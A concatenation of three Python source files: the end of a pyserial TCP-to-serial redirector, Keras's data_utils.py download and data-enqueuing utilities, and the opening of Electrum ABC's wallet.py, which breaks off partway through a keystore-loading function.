mode = options.ser_newline.upper()
if mode == 'CR':
ser_newline = '\r'
elif mode == 'LF':
ser_newline = '\n'
elif mode == 'CR+LF' or mode == 'CRLF':
ser_newline = '\r\n'
else:
parser.error("Invalid value for --ser-nl. Valid are 'CR', 'LF' and 'CR+LF'/'CRLF'.")
# connect to serial port
ser = serial.Serial()
ser.port = port
ser.baudrate = baudrate
ser.parity = options.parity
ser.rtscts = options.rtscts
ser.xonxoff = options.xonxoff
ser.timeout = 1 # required so that the reader thread can exit
if not options.quiet:
sys.stderr.write("--- TCP/IP to Serial redirector --- type Ctrl-C / BREAK to quit\n")
sys.stderr.write("--- %s %s,%s,%s,%s ---\n" % (ser.portstr, ser.baudrate, 8, ser.parity, 1))
try:
ser.open()
except serial.SerialException, e:
sys.stderr.write("Could not open serial port %s: %s\n" % (ser.portstr, e))
sys.exit(1)
if options.rts_state is not None:
ser.setRTS(options.rts_state)
if options.dtr_state is not None:
ser.setDTR(options.dtr_state)
srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
srv.bind( ('', options.local_port) )
srv.listen(1)
while True:
try:
sys.stderr.write("Waiting for connection on %s...\n" % options.local_port)
connection, addr = srv.accept()
sys.stderr.write('Connected by %s\n' % (addr,))
# enter network <-> serial loop
r = Redirector(
ser,
connection,
options.convert and ser_newline or None,
options.convert and net_newline or None,
options.spy,
)
r.shortcut()
if options.spy: sys.stdout.write('\n')
sys.stderr.write('Disconnected\n')
connection.close()
except KeyboardInterrupt:
break
except socket.error, msg:
sys.stderr.write('ERROR: %s\n' % msg)
sys.stderr.write('\n--- exit ---\n')
|
data_utils.py
|
"""Utilities for file download and caching."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import hashlib
import multiprocessing
import os
import random
import shutil
import sys
import tarfile
import threading
import time
import traceback
import zipfile
from abc import abstractmethod
from contextlib import closing
from multiprocessing.pool import ThreadPool
import numpy as np
import six
from six.moves.urllib.error import HTTPError
from six.moves.urllib.error import URLError
from six.moves.urllib.request import urlopen
try:
import queue
except ImportError:
import Queue as queue
from ..utils.generic_utils import Progbar
if sys.version_info[0] == 2:
def urlretrieve(url, filename, reporthook=None, data=None):
"""Replacement for `urlretrive` for Python 2.
Under Python 2, `urlretrieve` relies on `FancyURLopener` from legacy
`urllib` module, known to have issues with proxy management.
# Arguments
url: url to retrieve.
filename: where to store the retrieved data locally.
reporthook: a hook function that will be called once
on establishment of the network connection and once
after each block read thereafter.
The hook will be passed three arguments;
a count of blocks transferred so far,
a block size in bytes, and the total size of the file.
data: `data` argument passed to `urlopen`.
"""
def chunk_read(response, chunk_size=8192, reporthook=None):
content_type = response.info().get('Content-Length')
total_size = -1
if content_type is not None:
total_size = int(content_type.strip())
count = 0
while True:
chunk = response.read(chunk_size)
count += 1
if reporthook is not None:
reporthook(count, chunk_size, total_size)
if chunk:
yield chunk
else:
break
with closing(urlopen(url, data)) as response, open(filename, 'wb') as fd:
for chunk in chunk_read(response, reporthook=reporthook):
fd.write(chunk)
else:
from six.moves.urllib.request import urlretrieve
def _extract_archive(file_path, path='.', archive_format='auto'):
"""Extracts an archive if it matches tar, tar.gz, tar.bz, or zip formats.
# Arguments
file_path: path to the archive file
path: path to extract the archive file
archive_format: Archive format to try for extracting the file.
Options are 'auto', 'tar', 'zip', and None.
'tar' includes tar, tar.gz, and tar.bz files.
The default 'auto' is ['tar', 'zip'].
None or an empty list will return no matches found.
# Returns
True if a match was found and an archive extraction was completed,
False otherwise.
"""
if archive_format is None:
return False
if archive_format is 'auto':
archive_format = ['tar', 'zip']
if isinstance(archive_format, six.string_types):
archive_format = [archive_format]
for archive_type in archive_format:
if archive_type is 'tar':
open_fn = tarfile.open
is_match_fn = tarfile.is_tarfile
if archive_type is 'zip':
open_fn = zipfile.ZipFile
is_match_fn = zipfile.is_zipfile
if is_match_fn(file_path):
with open_fn(file_path) as archive:
try:
archive.extractall(path)
except (tarfile.TarError, RuntimeError,
KeyboardInterrupt):
if os.path.exists(path):
if os.path.isfile(path):
os.remove(path)
else:
shutil.rmtree(path)
raise
return True
return False
def get_file(fname,
origin,
untar=False,
md5_hash=None,
file_hash=None,
cache_subdir='datasets',
hash_algorithm='auto',
extract=False,
archive_format='auto',
cache_dir=None):
"""Downloads a file from a URL if it not already in the cache.
By default the file at the url `origin` is downloaded to the
cache_dir `~/.keras`, placed in the cache_subdir `datasets`,
and given the filename `fname`. The final location of a file
`example.txt` would therefore be `~/.keras/datasets/example.txt`.
Files in tar, tar.gz, tar.bz, and zip formats can also be extracted.
Passing a hash will verify the file after download. The command line
programs `shasum` and `sha256sum` can compute the hash.
# Arguments
fname: Name of the file. If an absolute path `/path/to/file.txt` is
specified the file will be saved at that location.
origin: Original URL of the file.
untar: Deprecated in favor of 'extract'.
boolean, whether the file should be decompressed
md5_hash: Deprecated in favor of 'file_hash'.
md5 hash of the file for verification
file_hash: The expected hash string of the file after download.
The sha256 and md5 hash algorithms are both supported.
cache_subdir: Subdirectory under the Keras cache dir where the file is
saved. If an absolute path `/path/to/folder` is
specified the file will be saved at that location.
hash_algorithm: Select the hash algorithm to verify the file.
options are 'md5', 'sha256', and 'auto'.
The default 'auto' detects the hash algorithm in use.
extract: True tries extracting the file as an Archive, like tar or zip.
archive_format: Archive format to try for extracting the file.
Options are 'auto', 'tar', 'zip', and None.
'tar' includes tar, tar.gz, and tar.bz files.
The default 'auto' is ['tar', 'zip'].
None or an empty list will return no matches found.
cache_dir: Location to store cached files, when None it
defaults to the [Keras Directory](/faq/#where-is-the-keras-configuration-filed-stored).
# Returns
Path to the downloaded file
"""
if cache_dir is None:
cache_dir = os.path.join(os.path.expanduser('~'), '.keras')
if md5_hash is not None and file_hash is None:
file_hash = md5_hash
hash_algorithm = 'md5'
datadir_base = os.path.expanduser(cache_dir)
if not os.access(datadir_base, os.W_OK):
datadir_base = os.path.join('/tmp', '.keras')
datadir = os.path.join(datadir_base, cache_subdir)
if not os.path.exists(datadir):
os.makedirs(datadir)
if untar:
untar_fpath = os.path.join(datadir, fname)
fpath = untar_fpath + '.tar.gz'
else:
fpath = os.path.join(datadir, fname)
download = False
if os.path.exists(fpath):
# File found; verify integrity if a hash was provided.
if file_hash is not None:
if not validate_file(fpath, file_hash, algorithm=hash_algorithm):
print('A local file was found, but it seems to be '
'incomplete or outdated because the ' + hash_algorithm +
' file hash does not match the original value of ' +
file_hash + ' so we will re-download the data.')
download = True
else:
download = True
if download:
print('Downloading data from', origin)
class ProgressTracker(object):
# Maintain progbar for the lifetime of download.
# This design was chosen for Python 2.7 compatibility.
progbar = None
def dl_progress(count, block_size, total_size):
if ProgressTracker.progbar is None:
if total_size is -1:
total_size = None
ProgressTracker.progbar = Progbar(total_size)
else:
ProgressTracker.progbar.update(count * block_size)
error_msg = 'URL fetch failure on {}: {} -- {}'
try:
try:
urlretrieve(origin, fpath, dl_progress)
except URLError as e:
raise Exception(error_msg.format(origin, e.errno, e.reason))
except HTTPError as e:
raise Exception(error_msg.format(origin, e.code, e.msg))
except (Exception, KeyboardInterrupt) as e:
if os.path.exists(fpath):
os.remove(fpath)
raise
ProgressTracker.progbar = None
if untar:
if not os.path.exists(untar_fpath):
_extract_archive(fpath, datadir, archive_format='tar')
return untar_fpath
if extract:
_extract_archive(fpath, datadir, archive_format)
return fpath
def _hash_file(fpath, algorithm='sha256', chunk_size=65535):
"""Calculates a file sha256 or md5 hash.
# Example
```python
>>> from keras.data_utils import _hash_file
>>> _hash_file('/path/to/file.zip')
'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855'
```
# Arguments
fpath: path to the file being validated
algorithm: hash algorithm, one of 'auto', 'sha256', or 'md5'.
The default 'auto' detects the hash algorithm in use.
chunk_size: Bytes to read at a time, important for large files.
# Returns
The file hash
"""
if (algorithm is 'sha256') or (algorithm is 'auto' and len(hash) is 64):
hasher = hashlib.sha256()
else:
hasher = hashlib.md5()
with open(fpath, 'rb') as fpath_file:
for chunk in iter(lambda: fpath_file.read(chunk_size), b''):
hasher.update(chunk)
return hasher.hexdigest()
def validate_file(fpath, file_hash, algorithm='auto', chunk_size=65535):
"""Validates a file against a sha256 or md5 hash.
# Arguments
fpath: path to the file being validated
file_hash: The expected hash string of the file.
The sha256 and md5 hash algorithms are both supported.
algorithm: Hash algorithm, one of 'auto', 'sha256', or 'md5'.
The default 'auto' detects the hash algorithm in use.
chunk_size: Bytes to read at a time, important for large files.
# Returns
Whether the file is valid
"""
if ((algorithm is 'sha256') or
(algorithm is 'auto' and len(file_hash) is 64)):
hasher = 'sha256'
else:
hasher = 'md5'
if str(_hash_file(fpath, hasher, chunk_size)) == str(file_hash):
return True
else:
return False
class Sequence(object):
"""Base object for fitting to a sequence of data, such as a dataset.
Every `Sequence` must implements the `__getitem__` and the `__len__` methods.
If you want to modify your dataset between epochs you may implement `on_epoch_end`.
The method `__getitem__` should return a complete batch.
# Notes
`Sequence` are a safer way to do multiprocessing. This structure guarantees that the network will only train once
on each sample per epoch which is not the case with generators.
# Examples
```python
from skimage.io import imread
from skimage.transform import resize
import numpy as np
# Here, `x_set` is list of path to the images
# and `y_set` are the associated classes.
class CIFAR10Sequence(Sequence):
def __init__(self, x_set, y_set, batch_size):
self.x, self.y = x_set, y_set
self.batch_size = batch_size
def __len__(self):
return int(np.ceil(len(self.x) / float(self.batch_size)))
def __getitem__(self, idx):
batch_x = self.x[idx * self.batch_size:(idx + 1) * self.batch_size]
batch_y = self.y[idx * self.batch_size:(idx + 1) * self.batch_size]
return np.array([
resize(imread(file_name), (200, 200))
for file_name in batch_x]), np.array(batch_y)
```
"""
@abstractmethod
def __getitem__(self, index):
"""Gets batch at position `index`.
# Arguments
index: position of the batch in the Sequence.
# Returns
A batch
"""
raise NotImplementedError
@abstractmethod
def __len__(self):
"""Number of batch in the Sequence.
# Returns
The number of batches in the Sequence.
"""
raise NotImplementedError
def on_epoch_end(self):
"""Method called at the end of every epoch.
"""
pass
def __iter__(self):
"""Create an infinite generator that iterate over the Sequence."""
while True:
for item in (self[i] for i in range(len(self))):
yield item
# Global variables to be shared across processes
_SHARED_SEQUENCES = {}
# We use a Value to provide unique id to different processes.
_SEQUENCE_COUNTER = None
def init_pool(seqs):
global _SHARED_SEQUENCES
_SHARED_SEQUENCES = seqs
def get_index(uid, i):
"""Get the value from the Sequence `uid` at index `i`.
To allow multiple Sequences to be used at the same time, we use `uid` to
get a specific one. A single Sequence would cause the validation to
overwrite the training Sequence.
# Arguments
uid: int, Sequence identifier
i: index
# Returns
The value at index `i`.
"""
return _SHARED_SEQUENCES[uid][i]
class SequenceEnqueuer(object):
"""Base class to enqueue inputs.
The task of an Enqueuer is to use parallelism to speed up preprocessing.
This is done with processes or threads.
# Examples
```python
enqueuer = SequenceEnqueuer(...)
enqueuer.start()
datas = enqueuer.get()
for data in datas:
# Use the inputs; training, evaluating, predicting.
# ... stop sometime.
enqueuer.close()
```
The `enqueuer.get()` should be an infinite stream of datas.
"""
@abstractmethod
def is_running(self):
raise NotImplementedError
@abstractmethod
def start(self, workers=1, max_queue_size=10):
"""Starts the handler's workers.
# Arguments
workers: number of worker threads
max_queue_size: queue size
(when full, threads could block on `put()`).
"""
raise NotImplementedError
@abstractmethod
def stop(self, timeout=None):
"""Stop running threads and wait for them to exit, if necessary.
Should be called by the same thread which called start().
# Arguments
timeout: maximum time to wait on thread.join()
"""
raise NotImplementedError
@abstractmethod
def get(self):
"""Creates a generator to extract data from the queue.
Skip the data if it is `None`.
# Returns
Generator yielding tuples `(inputs, targets)`
or `(inputs, targets, sample_weights)`.
"""
raise NotImplementedError
class OrderedEnqueuer(SequenceEnqueuer):
"""Builds a Enqueuer from a Sequence.
Used in `fit_generator`, `evaluate_generator`, `predict_generator`.
# Arguments
sequence: A `keras.utils.data_utils.Sequence` object.
use_multiprocessing: use multiprocessing if True, otherwise threading
shuffle: whether to shuffle the data at the beginning of each epoch
"""
def __init__(self, sequence,
use_multiprocessing=False,
shuffle=False):
self.sequence = sequence
self.use_multiprocessing = use_multiprocessing
global _SEQUENCE_COUNTER
if _SEQUENCE_COUNTER is None:
try:
_SEQUENCE_COUNTER = multiprocessing.Value('i', 0)
except OSError:
# In this case the OS does not allow us to use
# multiprocessing. We resort to an int
# for enqueuer indexing.
_SEQUENCE_COUNTER = 0
if isinstance(_SEQUENCE_COUNTER, int):
self.uid = _SEQUENCE_COUNTER
_SEQUENCE_COUNTER += 1
else:
# Doing Multiprocessing.Value += x is not process-safe.
with _SEQUENCE_COUNTER.get_lock():
self.uid = _SEQUENCE_COUNTER.value
_SEQUENCE_COUNTER.value += 1
self.shuffle = shuffle
self.workers = 0
self.executor_fn = None
self.queue = None
self.run_thread = None
self.stop_signal = None
def is_running(self):
return self.stop_signal is not None and not self.stop_signal.is_set()
def start(self, workers=1, max_queue_size=10):
"""Start the handler's workers.
# Arguments
workers: number of worker threads
max_queue_size: queue size
(when full, workers could block on `put()`)
"""
if self.use_multiprocessing:
self.executor_fn = lambda seqs: multiprocessing.Pool(workers,
initializer=init_pool,
initargs=(seqs,))
else:
# We do not need the init since it's threads.
self.executor_fn = lambda _: ThreadPool(workers)
self.workers = workers
self.queue = queue.Queue(max_queue_size)
self.stop_signal = threading.Event()
self.run_thread = threading.Thread(target=self._run)
self.run_thread.daemon = True
self.run_thread.start()
def _wait_queue(self):
"""Wait for the queue to be empty."""
while True:
time.sleep(0.1)
if self.queue.unfinished_tasks == 0 or self.stop_signal.is_set():
return
def _run(self):
"""Submits request to the executor and queue the `Future` objects."""
sequence = list(range(len(self.sequence)))
self._send_sequence() # Share the initial sequence
while True:
if self.shuffle:
random.shuffle(sequence)
with closing(self.executor_fn(_SHARED_SEQUENCES)) as executor:
for i in sequence:
if self.stop_signal.is_set():
return
self.queue.put(
executor.apply_async(get_index, (self.uid, i)), block=True)
# Done with the current epoch, waiting for the final batches
self._wait_queue()
if self.stop_signal.is_set():
# We're done
return
# Call the internal on epoch end.
self.sequence.on_epoch_end()
self._send_sequence() # Update the pool
def get(self):
"""Creates a generator to extract data from the queue.
Skip the data if it is `None`.
# Yields
The next element in the queue, i.e. a tuple
`(inputs, targets)` or
`(inputs, targets, sample_weights)`.
"""
try:
while self.is_running():
inputs = self.queue.get(block=True).get()
self.queue.task_done()
if inputs is not None:
yield inputs
except Exception as e:
self.stop()
six.raise_from(StopIteration(e), e)
def _send_sequence(self):
"""Send current Sequence to all workers."""
# For new processes that may spawn
_SHARED_SEQUENCES[self.uid] = self.sequence
def stop(self, timeout=None):
"""Stops running threads and wait for them to exit, if necessary.
Should be called by the same thread which called `start()`.
# Arguments
timeout: maximum time to wait on `thread.join()`
"""
self.stop_signal.set()
with self.queue.mutex:
self.queue.queue.clear()
self.queue.unfinished_tasks = 0
self.queue.not_full.notify()
self.run_thread.join(timeout)
_SHARED_SEQUENCES[self.uid] = None
class GeneratorEnqueuer(SequenceEnqueuer):
"""Builds a queue out of a data generator.
The provided generator can be finite in which case the class will throw
a `StopIteration` exception.
Used in `fit_generator`, `evaluate_generator`, `predict_generator`.
# Arguments
generator: a generator function which yields data
use_multiprocessing: use multiprocessing if True, otherwise threading
wait_time: time to sleep in-between calls to `put()`
random_seed: Initial seed for workers,
will be incremented by one for each worker.
"""
def __init__(self, generator,
use_multiprocessing=False,
wait_time=0.05,
seed=None):
self.wait_time = wait_time
self._generator = generator
if os.name is 'nt' and use_multiprocessing is True:
# On Windows, avoid **SYSTEMATIC** error in `multiprocessing`:
# `TypeError: can't pickle generator objects`
# => Suggest multithreading instead of multiprocessing on Windows
raise ValueError('Using a generator with `use_multiprocessing=True`'
' is not supported on Windows (no marshalling of'
' generators across process boundaries). Instead,'
' use single thread/process or multithreading.')
else:
self._use_multiprocessing = use_multiprocessing
self._threads = []
self._stop_event = None
self._manager = None
self.queue = None
self.seed = seed
def _data_generator_task(self):
if self._use_multiprocessing is False:
while not self._stop_event.is_set():
with self.genlock:
try:
if (self.queue is not None and
self.queue.qsize() < self.max_queue_size):
# On all OSes, avoid **SYSTEMATIC** error
# in multithreading mode:
# `ValueError: generator already executing`
# => Serialize calls to
# infinite iterator/generator's next() function
generator_output = next(self._generator)
self.queue.put((True, generator_output))
else:
time.sleep(self.wait_time)
except StopIteration:
break
except Exception as e:
# Can't pickle tracebacks.
# As a compromise, print the traceback and pickle None instead.
if not hasattr(e, '__traceback__'):
setattr(e, '__traceback__', sys.exc_info()[2])
self.queue.put((False, e))
self._stop_event.set()
break
else:
while not self._stop_event.is_set():
try:
if (self.queue is not None and
self.queue.qsize() < self.max_queue_size):
generator_output = next(self._generator)
self.queue.put((True, generator_output))
else:
time.sleep(self.wait_time)
except StopIteration:
break
except Exception as e:
# Can't pickle tracebacks.
# As a compromise, print the traceback and pickle None instead.
traceback.print_exc()
setattr(e, '__traceback__', None)
self.queue.put((False, e))
self._stop_event.set()
break
def start(self, workers=1, max_queue_size=10):
"""Kicks off threads which add data from the generator into the queue.
# Arguments
workers: number of worker threads
max_queue_size: queue size
(when full, threads could block on `put()`)
"""
try:
self.max_queue_size = max_queue_size
if self._use_multiprocessing:
self._manager = multiprocessing.Manager()
self.queue = self._manager.Queue(maxsize=max_queue_size)
self._stop_event = multiprocessing.Event()
else:
# On all OSes, avoid **SYSTEMATIC** error in multithreading mode:
# `ValueError: generator already executing`
# => Serialize calls to infinite iterator/generator's next() function
self.genlock = threading.Lock()
self.queue = queue.Queue(maxsize=max_queue_size)
self._stop_event = threading.Event()
for _ in range(workers):
if self._use_multiprocessing:
# Reset random seed else all children processes
# share the same seed
np.random.seed(self.seed)
thread = multiprocessing.Process(target=self._data_generator_task)
thread.daemon = True
if self.seed is not None:
self.seed += 1
else:
thread = threading.Thread(target=self._data_generator_task)
self._threads.append(thread)
thread.start()
except:
self.stop()
raise
def is_running(self):
return self._stop_event is not None and not self._stop_event.is_set()
def stop(self, timeout=None):
"""Stops running threads and wait for them to exit, if necessary.
Should be called by the same thread which called `start()`.
# Arguments
timeout: maximum time to wait on `thread.join()`.
"""
if self.is_running():
self._stop_event.set()
for thread in self._threads:
if self._use_multiprocessing:
if thread.is_alive():
thread.terminate()
else:
# The thread.is_alive() test is subject to a race condition:
# the thread could terminate right after the test and before the
# join, rendering this test meaningless -> Call thread.join()
# always, which is ok no matter what the status of the thread.
thread.join(timeout)
if self._manager:
self._manager.shutdown()
self._threads = []
self._stop_event = None
self.queue = None
def get(self):
"""Creates a generator to extract data from the queue.
Skip the data if it is `None`.
# Yields
The next element in the queue, i.e. a tuple
`(inputs, targets)` or
`(inputs, targets, sample_weights)`.
"""
while self.is_running():
if not self.queue.empty():
success, value = self.queue.get()
# Rethrow any exceptions found in the queue
if not success:
six.reraise(value.__class__, value, value.__traceback__)
# Yield regular values
if value is not None:
yield value
else:
all_finished = all([not thread.is_alive() for thread in self._threads])
if all_finished and self.queue.empty():
raise StopIteration()
else:
time.sleep(self.wait_time)
# Make sure to rethrow the first exception in the queue, if any
while not self.queue.empty():
success, value = self.queue.get()
if not success:
six.reraise(value.__class__, value, value.__traceback__)
|
wallet.py
|
# Electrum ABC - lightweight eCash client
# Copyright (C) 2020 The Electrum ABC developers
# Copyright (C) 2015 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# Wallet classes:
# - ImportedAddressWallet: imported address, no keystore
# - ImportedPrivkeyWallet: imported private keys, keystore
# - Standard_Wallet: one keystore, P2PKH
# - Multisig_Wallet: several keystores, P2SH
import copy
import errno
import json
import itertools
import os
import queue
import random
import threading
import time
from collections import defaultdict, namedtuple
from enum import Enum, auto
from typing import Set, Tuple, Union
from .constants import DUST_THRESHOLD
from .i18n import ngettext
from .util import (NotEnoughFunds, ExcessiveFee, PrintError,
UserCancelled, InvalidPassword, profiler,
format_satoshis, format_time, finalization_print_error,
to_string, bh2u, TimeoutException)
from .address import Address, Script, ScriptOutput, PublicKey
from .version import PACKAGE_VERSION
from .keystore import load_keystore, Hardware_KeyStore, Imported_KeyStore, BIP32_KeyStore, xpubkey_to_address
from . import mnemo
from . import keystore
from .storage import (
multisig_type,
WalletStorage,
STO_EV_PLAINTEXT,
STO_EV_USER_PW,
STO_EV_XPUB_PW,
)
from .transaction import Transaction, InputValueMissing
from .plugins import run_hook
from . import bitcoin
from . import coinchooser
from .synchronizer import Synchronizer
from .verifier import SPV, SPVDelegate
from . import schnorr
from . import ecc_fast
from .blockchain import NULL_HASH_HEX
from . import paymentrequest
from .paymentrequest import InvoiceStore, PR_PAID, PR_UNPAID, PR_UNKNOWN, PR_EXPIRED
from .contacts import Contacts
from . import cashacct
from . import slp
from .i18n import _
DEFAULT_CONFIRMED_ONLY = False
def sweep_preparations(privkeys, network, imax=100):
class InputsMaxxed(Exception):
pass
def append_utxos_to_inputs(inputs, pubkey, txin_type):
if txin_type == 'p2pkh':
address = Address.from_pubkey(pubkey)
else:
address = PublicKey.from_pubkey(pubkey)
sh = address.to_scripthash_hex()
u = network.synchronous_get(('blockchain.scripthash.listunspent', [sh]))
for item in u:
if len(inputs) >= imax:
raise InputsMaxxed()
item['address'] = address
item['type'] = txin_type
item['prevout_hash'] = item['tx_hash']
item['prevout_n'] = item['tx_pos']
item['pubkeys'] = [pubkey]
item['x_pubkeys'] = [pubkey]
item['signatures'] = [None]
item['num_sig'] = 1
inputs.append(item)
def find_utxos_for_privkey(txin_type, privkey, compressed):
pubkey = bitcoin.public_key_from_private_key(privkey, compressed)
append_utxos_to_inputs(inputs, pubkey, txin_type)
keypairs[pubkey] = privkey, compressed
inputs = []
keypairs = {}
try:
for sec in privkeys:
txin_type, privkey, compressed = bitcoin.deserialize_privkey(sec)
find_utxos_for_privkey(txin_type, privkey, compressed)
# do other lookups to increase support coverage
if bitcoin.is_minikey(sec):
# minikeys don't have a compressed byte
# we lookup both compressed and uncompressed pubkeys
find_utxos_for_privkey(txin_type, privkey, not compressed)
elif txin_type == 'p2pkh':
# WIF serialization does not distinguish p2pkh and p2pk
# we also search for pay-to-pubkey outputs
find_utxos_for_privkey('p2pk', privkey, compressed)
elif txin_type == 'p2sh':
raise ValueError(_("The specified WIF key '{}' is a p2sh WIF key. These key types cannot be swept.").format(sec))
except InputsMaxxed:
pass
if not inputs:
raise ValueError(_('No inputs found. (Note that inputs need to be confirmed)'))
return inputs, keypairs
def sweep(privkeys, network, config, recipient, fee=None, imax=100, sign_schnorr=False):
inputs, keypairs = sweep_preparations(privkeys, network, imax)
total = sum(i.get('value') for i in inputs)
if fee is None:
outputs = [(bitcoin.TYPE_ADDRESS, recipient, total)]
tx = Transaction.from_io(inputs, outputs, sign_schnorr=sign_schnorr)
fee = config.estimate_fee(tx.estimated_size())
if total - fee < 0:
raise NotEnoughFunds(_('Not enough funds on address.') + '\nTotal: %d satoshis\nFee: %d'%(total, fee))
if total - fee < DUST_THRESHOLD:
raise NotEnoughFunds(_('Not enough funds on address.') + f'\nTotal: {total} satoshis\nFee: {fee}\nDust Threshold: {DUST_THRESHOLD}')
outputs = [(bitcoin.TYPE_ADDRESS, recipient, total - fee)]
locktime = network.get_local_height()
tx = Transaction.from_io(inputs, outputs, locktime=locktime, sign_schnorr=sign_schnorr)
tx.BIP_LI01_sort()
tx.sign(keypairs)
return tx
class Abstract_Wallet(PrintError, SPVDelegate):
"""
Wallet classes are created to handle various address generation methods.
Completion states (watching-only, single account, no seed, etc) are handled inside classes.
"""
max_change_outputs = 3
def __init__(self, storage):
self.electrum_version = PACKAGE_VERSION
self.storage = storage
self.thread = None # this is used by the qt main_window to store a QThread. We just make sure it's always defined as an attribute here.
self.network = None
# verifier (SPV) and synchronizer are started in start_threads
self.synchronizer = None
self.verifier = None
self.weak_window = None # Some of the GUI classes, such as the Qt ElectrumWindow, use this to refer back to themselves. This should always be a weakref.ref (Weak.ref), or None
# CashAccounts subsystem. Its network-dependent layer is started in
# start_threads. Note: object instantiation should be lightweight here.
# self.cashacct.load() is called later in this function to load data.
self.cashacct = cashacct.CashAcct(self)
self.slp = slp.WalletData(self)
finalization_print_error(self.cashacct) # debug object lifecycle
finalization_print_error(self.slp) # debug object lifecycle
# Removes defunct entries from self.pruned_txo asynchronously
self.pruned_txo_cleaner_thread = None
# Cache of Address -> (c,u,x) balance. This cache is used by
# get_addr_balance to significantly speed it up (it is called a lot).
# Cache entries are invalidated when tx's are seen involving this
# address (address history chages). Entries to this cache are added
# only inside get_addr_balance.
# Note that this data structure is touched by the network and GUI
# thread concurrently without the use of locks, because Python GIL
# allows us to get away with such things. As such do not iterate over
# this dict, but simply add/remove items to/from it in 1-liners (which
# Python's GIL makes thread-safe implicitly).
self._addr_bal_cache = {}
# We keep a set of the wallet and receiving addresses so that is_mine()
# checks are O(logN) rather than O(N). This creates/resets that cache.
self.invalidate_address_set_cache()
self.gap_limit_for_change = 20 # constant
# saved fields
self.use_change = storage.get('use_change', True)
self.multiple_change = storage.get('multiple_change', False)
self.labels = storage.get('labels', {})
# Frozen addresses
frozen_addresses = storage.get('frozen_addresses',[])
self.frozen_addresses = set(Address.from_string(addr)
for addr in frozen_addresses)
# Frozen coins (UTXOs) -- note that we have 2 independent levels of "freezing": address-level and coin-level.
# The two types of freezing are flagged independently of each other and 'spendable' is defined as a coin that satisfies
# BOTH levels of freezing.
self.frozen_coins = set(storage.get('frozen_coins', []))
self.frozen_coins_tmp = set() # in-memory only
self.change_reserved = set(Address.from_string(a) for a in storage.get('change_reserved', ()))
self.change_reserved_default = [Address.from_string(a) for a in storage.get('change_reserved_default', ())]
self.change_unreserved = [Address.from_string(a) for a in storage.get('change_unreserved', ())]
self.change_reserved_tmp = set() # in-memory only
# address -> list(txid, height)
history = storage.get('addr_history',{})
self._history = self.to_Address_dict(history)
# there is a difference between wallet.up_to_date and interface.is_up_to_date()
# interface.is_up_to_date() returns true when all requests have been answered and processed
# wallet.up_to_date is true when the wallet is synchronized (stronger requirement)
self.up_to_date = False
# The only lock. We used to have two here. That was more technical debt
# without much purpose. 1 lock is sufficient. In particular data
# structures that are touched by the network thread as well as the GUI
# (such as self.transactions, history, etc) need to be synchronized
# using this mutex.
self.lock = threading.RLock()
# load requests
requests = self.storage.get('payment_requests', {})
for key, req in requests.items():
req['address'] = Address.from_string(key)
self.receive_requests = {req['address']: req
for req in requests.values()}
# Transactions pending verification. A map from tx hash to transaction
# height. Access is contended so a lock is needed. Client code should
# use get_unverified_tx to get a thread-safe copy of this dict.
self.unverified_tx = defaultdict(int)
# Verified transactions. Each value is a (height, timestamp, block_pos) tuple. Access with self.lock.
self.verified_tx = storage.get('verified_tx3', {})
# save wallet type the first time
if self.storage.get('wallet_type') is None:
self.storage.put('wallet_type', self.wallet_type)
# invoices and contacts
self.invoices = InvoiceStore(self.storage)
self.contacts = Contacts(self.storage)
# cashacct is started in start_threads, but it needs to have relevant
# data here, before the below calls happen
self.cashacct.load()
self.slp.load() # try to load first so we can pick up the remove_transaction hook from load_transactions if need be
# Now, finally, after object is constructed -- we can do this
self.load_keystore_wrapper()
self.load_addresses()
self.load_transactions()
self.build_reverse_history()
self.check_history()
if self.slp.need_rebuild:
# load failed, must rebuild from self.transactions
self.slp.rebuild()
self.slp.save() # commit changes to self.storage
# Print debug message on finalization
finalization_print_error(self, "[{}/{}] finalized".format(type(self).__name__, self.diagnostic_name()))
@classmethod
def to_Address_dict(cls, d):
'''Convert a dict of strings to a dict of Adddress objects.'''
return {Address.from_string(text): value for text, value in d.items()}
@classmethod
def from_Address_dict(cls, d):
'''Convert a dict of Address objects to a dict of strings.'''
return {addr.to_storage_string(): value
for addr, value in d.items()}
def diagnostic_name(self):
return self.basename()
def __str__(self):
return self.basename()
def get_master_public_key(self):
return None
def load_keystore_wrapper(self):
""" Loads the keystore, but also tries to preserve derivation(s). Older
Electron Cash versions would not save the derivation for all keystore
types. So this function ensures:
1. That on first run, we store the keystore_derivations to top-level
storage (which is preserved always).
2. On subsequent runs we try and load the keystore_derivations from
storage and restore them if the individual keystore.derivation data
items were lost (because user loaded wallet with older Electron
Cash).
This function is provided to allow users to switch between old and new
EC versions. In the future if we deprecate the wallet format, or if
enough time has passed, this function may be removed and the simple
self.load_keystore() may be used instead. """
self.load_keystore()
if not hasattr(self, 'get_keystores'):
return
from .keystore import Deterministic_KeyStore, Old_KeyStore
keystores = self.get_keystores()
keystore_derivations = self.storage.get('keystore_derivations', [])
if len(keystore_derivations) != len(keystores):
keystore_derivations = [None] * len(keystores)
updated, updated_ks, updated_st = False, False, False
for i, keystore_ in enumerate(keystores):
if i == 0 and isinstance(keystore_, Deterministic_KeyStore) and not keystore_.seed_type:
# Attempt to update keystore.seed_type
if isinstance(keystore_, Old_KeyStore):
keystore_.seed_type = 'old'
updated_st = True
else:
# attempt to restore the seed_type based on wallet saved "seed_type"
typ = self.storage.get('seed_type')
if typ in ('standard', 'electrum'):
